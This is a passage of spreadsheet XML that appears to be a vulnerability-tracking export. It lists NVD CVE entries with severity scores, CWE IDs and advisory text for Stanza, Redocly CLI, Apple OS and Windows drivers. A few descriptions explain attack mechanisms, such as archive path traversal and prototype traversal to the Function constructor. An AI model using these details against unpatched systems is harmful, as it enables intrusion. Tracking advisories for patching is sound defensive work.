        <is>
          <t>Stanza is a Stanford NLP Python library for tokenization, sentence segmentation, NER, and parsing of many human languages. Prior to 1.14.0, stanza.resources.common.unzip in stanza/resources/common.py passes downloaded model and resource archives to zipfile.ZipFile.extractall without validating member paths, and the vulnerable extraction path is reachable through stanza.download and stanza.install_corenlp. A malicious archive containing parent-directory traversal entries can write outside the intended model directory, allowing files writable by the Stanza process to be overwritten and potentially enabling code execution through modified shell configuration, SSH authorization data, Python packages, or executable scripts. This issue is fixed in version 1.14.0.</t>
        </is>
      </c>
      <c r="S437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59974</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63325</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr"/>
      <c r="Q438" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>Redocly CLI makes OpenAPI validation, linting, and documentation workflows easier. Prior to version 2.33.0 of @redocly/respect-core and @redocly/cli, the respect command dynamically evaluates $faker runtime expressions in Arazzo descriptions. A crafted expression can traverse constructor, prototype, or __proto__ properties in packages/respect-core/src/modules/context-parser/get-value-from-context.ts, reach the JavaScript Function constructor, and execute arbitrary code when a user processes an untrusted description. The executed code runs with the privileges of the CLI process and can execute shell commands or read CI secrets. Users processing only trusted, self-authored workflows are not affected. This issue is fixed in @redocly/respect-core and @redocly/cli version 2.33.0.</t>
        </is>
      </c>
      <c r="S438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63325</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64790</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr"/>
      <c r="Q439" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>A path handling issue was addressed with improved validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to gain elevated privileges.</t>
        </is>
      </c>
      <c r="S439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64790</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65344</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr"/>
      <c r="Q440" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27. Processing a maliciously crafted video file may lead to unexpected app termination.</t>
        </is>
      </c>
      <c r="S440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65344</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K441"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441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr"/>
      <c r="Q441" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K442"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442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr"/>
      <c r="Q442" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K443"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443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr"/>
      <c r="Q443" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K444"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444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr"/>
      <c r="Q444" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K445"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445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr"/>
      <c r="Q445" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K446"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446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr"/>
      <c r="Q446" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K447"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447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr"/>
      <c r="Q447" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K448" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr"/>
      <c r="Q448" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K449"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449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr"/>
      <c r="Q449" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K450"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450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr"/>
      <c r="Q450" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69864</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr"/>
      <c r="Q451" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K452" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr"/>
      <c r="Q452" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K453"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453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr"/>
      <c r="Q453" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K454" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr"/>
      <c r="Q454" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R454" s="5" t="inlineStr">
        <is>
